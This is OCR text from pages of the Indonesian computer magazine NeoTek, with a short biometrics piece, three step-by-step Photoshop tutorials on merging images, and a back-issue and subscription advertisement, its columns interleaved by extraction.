Biometrics hadir sor teknologi milik Sony. flash dri-
dan menjadi pi- ve yang dikeluarkan diberi nama
lihan tetapi bio- thumbdrive.
metrics masih te-
rus dalam pe- KeyBoard
ngembangan dan
masih memiliki Yang selalu tidak
nilai materi yang ingin tertinggal da-
sangat tinggi, lam persaingan tek-
walaupun begitu nologi canggih ada-
masih tetap men- lah Microsoft dari
janjikan sistem group hardware yang
pengamanan yang diketuai oleh Tom
terbaik. Gibbons (General
Manager dari Micro-
BioMetric adalah metode otomatisasi yang mengizinkan soft's hardware
otorisasi kepada seseorang untuk account tertentu dengan group) mengeluar-
berdasarkan karakteristik biologis dan tingkah laku, seperti: kan produk berupa
wajah, sidik jari, tangan, tanda tangan, iris, retina, suara, keyboard yang di-
dan lain-lain. Semuanya bertujuan untuk mendapatkan lengkapi dengan teknologi biometrics. berapa kira-kira
sistem pengamanan tingkat tinggi dan teknologi verifikasi harga yang ditetapkan oleh Microsoft untuk produknya
personal. yang satu ini?
Jika anda penggemar film fiksi action produksi Hollywood, Tidak hanya produk-produk yang disebutkan di atas yang
sering diperlihatkan gambaran teknologi tingkat tinggi dikembangkan dengan teknologi biometrics, masih banyak
dengan sistem pengamanan yang digunakan berdasarkan produk lainnya seperti mouse, notebook, cellphone/PDA,
sidik jari atau retina mata. handbag, dan lain-lain.
Apakah biometrics ini diilhami dari film-film tersebut Yang pasti akan tetap terus merambah, mungkin ke per-
atau malah sebaliknya? Informasi mendalam mengenai alatan rumah tangga nantinya akan dilengkapi dengan
biometrics dapat anda temukan di teknologi biometrics. NeoTek akan membahas biometrics
http://www.biometrics.org atau http://perso.wanadoo.fr lebih jauh di edisi-edisi mendatang.

44 NeoTek Vol. IV No. 09


NeoStyle

PHOTOSHOP P
ADA PEMBAHASAN SEBELUMNYA SUDAH
membahas beberapa cara memberi
efek pada image.
Nah... pada kesempatan pada edisi ini akan

MENGGABUNGKAN dibahas mengenai beberap cara untuk meng-


gabung dua atau lebih image menjadi satu

BEBERAPAN IMAGE (1)


kesatuan image.
Dengan memanfaatkan fasilitas Feather,
Cut, dan Paste, sudah dapat dipastikan
anda nantinya akan mampu melakukan
Menggabung beberapa image menjadi satu kesatuan image. penggabungan beberapa image menjadi
satu untuk tujuan tertentu yang tergan-
Mungkin hal ini sudah pernah terbesit di pikiran anda. tung kepada keinginan anda sendiri.
MA Rody Candera (odyxb@bogor.net) memberikan trik- Tidak usah bingung... ikuti saja beberapa
trik untuk melengkapi artikel mengenai aplikasi mendaya- tahap yang akan diterangkan berikut ini.
gunakan Photoshop.

Penerapan fungsi Marquee Tool untuk menggabungkan beberapa image.

IMAGE SELECT & SIZE NEW IMAGE MARQUEE TOOL


1 Yang pertama dan terutama
adalah menentukan (File>Open)
2 Selanjutnya membuat bidang
image baru dimana merupakan
3 Kembali kepada salah satu image
dan pada ToolBox pilih tool Rec-
image-image yang akan dijadikan bidang akhir image project anda, tangular Marquee. Selanjutnya
sebagai project, dalam contoh ini klik File>New dan tentukan size arahkan mouse pointer anda pada
menggunakan 3 image. Atur imagenya seperti yang terlihat gambar, klik kiri dan tahan kemu-
tinggi masing-masing image pada gambar di atas. dian buatlah seperti yang terlihat
menjadi sama. pada gambar di atas, kemudian le-
paskan klik yang ditahan tadinya.

FEATHER CUT & PASTE RESULT


4 Setelah image terseleksi akibat
Rectangular Marquee yang anda
5 Lakukan Cut dengan cara
menekan Ctrl+X pada keyboard.
6 Lakukan hal yang sama pada
image lain yang telah
gunakan, lakukan klik kanan pada selanjutnya adalah melakukan dipersiapkan dan posisikan yang
daerah seleksi. Pilih Feather, paste pada bidang new image tepat hingga image benar-benar
kemudian tentukan nilai Feather yang telah dipersiapkan. terlihat menyatu menjadi satu
Radius-nya 20 pixels lalu klik Posisikan image yang dipastekan kesatuan image, seperti yang
tombol OK. pada posisi yang anda anggap terlihat pada gambar di atas.
tepat.

Vol. IV No. 09 NeoTek 45


NeoStyle

PHOTOSHOP M
ASIH MENGENAI TEKNIK MENGGABUNG -
kan beberapa image menjadi ke-
satuan image.
Berikut ini merupakan teknik yang lebih

MENGGABUNGKAN mudah untuk dilakukan tetapi tidak kalah


menariknya untuk diangkat menjadi arti-

BEBERAPAN IMAGE (2)


kel seri menggabungkan beberapa image.
Jika anda sudah mencoba teknik yang per-
tama yang telah dijelaskan, maka untuk
yang ini makin akan cepat anda mengerti.
MA Rody Candera (odyxb@bogor.net) melanjutkan Simak tahap-tahap penjelasan mengenai
teknik menggabungkan beberapa image
bahasan menggabungkan beberapa image menggunakan berikut di bawah ini.
Photoshop dengan lasso tools sehingga mengikuti alur
yang ingin anda siapkan.

Penerapan fungsi Lasso Tool untuk menggabungkan beberapa image.

IMAGE SELECT & SIZE NEW IMAGE IMAGE POSITION


1 Langkah pertama adalah
menentukan (File>Open) image-
2 langkah berikut membuat bidang
image baru dimana merupakan
3 Kembali pada salah satu image
yang disiapkan, copy image
image yang akan dijadikan bidang akhir image project anda, tersebut dan kemudian pastekan
sebagai project, dalam contoh ini klik File>New dan tentukan size pada bidang new image anda,
menggunakan 3 image. Atur tinggi imagenya seperti yang terlihat posisikan di bagian tengah.
masing-masing image menjadi pada gambar di atas.
sama.

LASSO TOOL COPY & PASTE RESULT


4 Kembali pada salah satu image
lainnya. Pada ToolBox, pilih tool
5 Setelah seleksi terbentuk, copy
selesi tersebut (Edit>Copy)
6 Lakukan hal yang sama pada
image lainnya yang telah
Lasso, tepatnya Polygonal Lasso kemudian paste pada bidang dipersiapkan sebelumnya.
Tool. Buatlah seleksi mengitari new image. Posiisikan pada Pastikan posisinya tepat pada
bagian gambar yang ingin diambil posisi yang yang anda anggap bidang new image yang telah
untuk disatukan nantinya, seperti tepat seperti yang diperlihatkan anda siapkan sebagai tampungan
yang terlihat pada gambar di atas. pada gambar di atas. akhir project anda sehingga
hasilnya terlihat baik.

46 NeoTek Vol. IV No. 09


NeoStyle

PHOTOSHOP U
NTUK BAHASAN KALI INI MERUPAKAN
ekstra triks untuk menciptakan
image yang benar-benar memiliki
nilai seni sehingga photo anda menjadi

MENGGABUNGKAN lebih menarik untuk dinikmati..


Teknik berikut ini menghasilkan image

BEBERAPAN IMAGE (3)


bergaya dunia publishing, karena tujuan
akhir dari project manipulasi image diha-
rapkan memiliki cita rasa tersendiri.
Bagi anda yang ingin terjun di dunia de-
sign gambar mungkin bahasan kali ini
Masih mengenai urusan gabung menggabungkan image, dapat memberikan ilham maupun sebagai
tapi berikut pada bahasan ini MA Rody Candera tambahan ilmu untuk membuat image
(odyxb@bogor.net) menyajikan manipulasi image yang lebih yang bergaya.
Ingin mencobanya? Silakan ikuti tahap-
banyak menjadi satu image yang memiliki karakterisitik nilai tahap penjelasan berikut.
seni untuk menghadirkan nuansa yang asyik di mata.

Penerapan Adobe Photoshop untuk menciptakan image yang memiliki karya seni.

NEW BLANK DOCUMENT NEW DOCUMENT DUST & SCRATCHES


1 Anda memerlukan sebuah New
Blank Document (File>New),
2 Setelah selesai, pada popup
History lakukan klik kanan dan
3 Beri efek Dust & Scratches
(Filter>Noise>Dust & Scratches),
tentukan ukurannya baik tinggi pilih opsi New Document. Buka tentukan nilai radius-nya sebesar
dan lebarnya sesuai dengan image yang akan dimanipulasi, 3 pixels dan nilai treshold
image yang akan dimanipulasi lakukan seleksi (Ctrl+A) dan copy sebesar 0 levels
dan tentukan resolution-nya 300 (Ctrl+C). Kembali pada New
pixels. Document kemudian paste
(Ctrl+V).

DUPLICATE LAYER GAUSSIAN BLUR MASK & GRADIENT


4 Langkah selanjutnya, membuat
duplikat layer. Pada popup Layer,
5 Aktif pada layer duplikat, beri
efek blur (Filter>Blur>Gaussian
6 Selanjutnya menambahkan Layer
Mask Setelah itu, pada
klik kanan pada Layer 1 kemudian Blur). Tentukan nilai radius-nya ToolBox pilih Gradient Tool. Guna-
pilih opsi Duplicate Layer..., sebesar 15 pixels saja. kan Gradient Tool pada image di-
silakan anda tentukan nama mulai dari sudut bawah kiri, klik
duplicate layer tersebut, defaultnya kiri dan tahan kemudian arahkan
diberi nama Layer 1 Copy. ke sudut atas kanan dan lepaskan
klik yang ditahan tadinya

Vol. IV No. 09 NeoTek 47


NeoStyle

MENAMBAHKAN IMAGE 1 MENAMBAHKAN IMAGE 1 MENAMBAHKAN IMAGE 2


7 Saatnya memasukkan image lain
kepada image utama. Buka image
8 Agar image tambahan terlihat
sebagai latar yang menyatu
9 Selesai image tambahan 1, lan-
jutkan dengan menambahkan
yang akan di tambahkan dengan latar image utama, image tambahan2. Yang dilaku-
kemudian copy dan paste ke tambahkan Layer Mask kemudian kan terhadap image tambahan 2
image utama dan posisikan yang gunakan Gradient Tool pada tidak jauh berbeda dengan image
baik. Guna Eraser Tool untuk image tambahan diletakan. tambahan 1. Dan beri efek Bright-
membuang bagian image Perhatikan gambar di atas. ness/Contrast (Image>Adjus-
tambahan yang tidak diinginkan. ment>Brightness/Contras)

MENAMBAHKAN IMAGE 3 MENAMBAHKAN IMAGE 4 IMAGE-IMAGE


10 Kembali tambahkan image
tambahan 3, yang dilakukan sama
11 kembali lakukan hal yang sama
untuk menambahkan image
12 Pada contoh bahasan ini hanya
mempergunakan 5 image
seperti menambahkan image 2. tambahan 4. Pengaturan efek dimana 1 image utama dan 4
Hanya perlu diperhatikan Brightness/Contrast menjadi image tambahan. Tidak hanya 4
penempatan image yang akan sangat penting agar membuat image saja yang dapat digunakan.
ditambahkan agar terlihat image tambahan seakan menyatu Anda dapat menambahkan lebih
menyatu satu dengan yang dengan image lainnya dan tidak banyak dan itu tergantung
lainnya. terkesan ditambahkan. dengan kreasi anda sendiri

PATTERN 1 PATTERN 2
13 Setelah proses menambahkan
image lainnya. Selanjutnya adalah
14 Langkah terakhir yaitu memberi-
kan pattern diluar bagian wajah,
memberikan efek Pattern jadi ketika pattern 2 di tambah-
(Edit>Fill). Efek Pattern ditujukan kan maka bagian wajah yang ti-
pada wajah, oleh karena itu bagian dak diharapkan memiliki efek
lainnya harus dibersihkan dengan pattern 2 harus dibersihkan de -
menggunakan Eraser Tool. ngan menggunakan Eraser tool.
Jreng!!! project anda selesai dan
selamat menikmati.

48 NeoTek Vol. IV No. 09


Iklan visionnet

Ketinggalan Membaca NeoTek?


OTEK DENGAN ARTIKEL-ARTIKEL Aswan Bakri
N hacking, security, programming,
maupun sekedar memanfaat-
BCA KCP Rawamangun
No. rek. 0940544131
NeoTek di stockist dijual dengan cover
price sebagai berikut:
kan software pada dasarnya tidak akan Dapatkan dari Stockist Vol. I (tanpa CD) No. 1 s/d 9, Rp6500,-
pernah basi dan layak dikoleksi. Vol. I (tanpa CD) No. 10 s/d 12, Rp9500,-
Untuk yang berada di luar Jakarta,
Tetapi bagaimana apabila anda baru- menghubungi NeoTek di Jakarta akan Vol. II (+CD) No. 1 s/d 12, Rp19.500,-
baru ini saja tahu adanya NeoTek, Vol. III (+CD) No. 1 s/d 12, Rp19.500,-
membawa kerepotan selain juga harus Vol. IV (+CD) No. 1 s/d 3, Rp19.500,-
atau edisi lama NeoTek ataupun CD- menanggung ongkos kirim. Untuk itu
nya hilang, dipinjam tidak dikemba- Vol. IV (+CD) No. 4 dst., Rp20.000,- (P.
NeoTek tersedia di beberapa kota sbb: Jawa) dan Rp22.000,- (Luar P. Jawa)
likan, ataupun rusak? Bandung
CV Angkasa Berlangganan
Dapatkan di Pameran
Jl. Merdeka No. 6 Untuk menjamin bahwa anda tidak
NeoTek selalu hadir di pameran-pameran Bandung 40111
komputer di Jakarta. (Mega Bazaar lagi ketinggalan edisi NeoTek, paling
Tel. 021-4204795, 4208955 baik berlangganan. Untuk itu hubungi:
Computer, Festival Komputer Indo- Fax. 022-4239183
nesia, dan IndoComtech). KRISHNAdiSTRIBUTOR
Semarang Tel. (021) 5835 0080
Dapatkan Langsung Lestat HP. (0816) 1187 111 (Boedi)
Jl. Kaligarang 2B email: krishnadistributor@neotek.co.id
Cara pasti adalah mendapatkan lang- Semarang 50237 Kontak: Boedi Krishnadi
sung dari NeoTek dengan menghubungi: Tel. 024-8411489 BCA No. rek. 342-239-1611
PT NeoTek Maju Mandiri Fax. 024-8445211
Gedung Cahaya Palmerah 503 Harga NeoTek+CD mulai edisi IV/04:
Surabaya Rp20.000,- ( P. Jawa)
Jl. Palmerah Utara III/9 Toko Buku URANUS
Jakarta 11480 Rp22.000,- (Luar P. Jawa)
Jl. Ngagel Jaya 89-91 Ongkos kirim gratis untuk DKI Jakarta,
Telp. 021-5481457, Fax. 021-5329041 Surabaya
email: redaksi@neotek.co.id (Marni) sedangkan untuk luar DKI Jakarta,
Tel. 031-5681388 Rp6500,- per eksemplar.
Keuntungannya anda dapat memesan Gorontalo
majalah+CD, majalah saja, atau CD Arbyn Dungga Ingin Menjadi Stockist?
saja, tetapi anda akan dibebani ongkos Jl. Prof. Dr. Aloei Saboe No 54, Yang berminat berinvestasi sedikit
kirim, selain harus mengirim uang Heledulaa Selatan, Gorontalo 96114, dalam distribusi NeoTek, silakan
terlebih dahulu ke rekening: Propinsi Gorontalo
hubungi pemasaran@neotek.co.id

Anda mungkin juga menyukai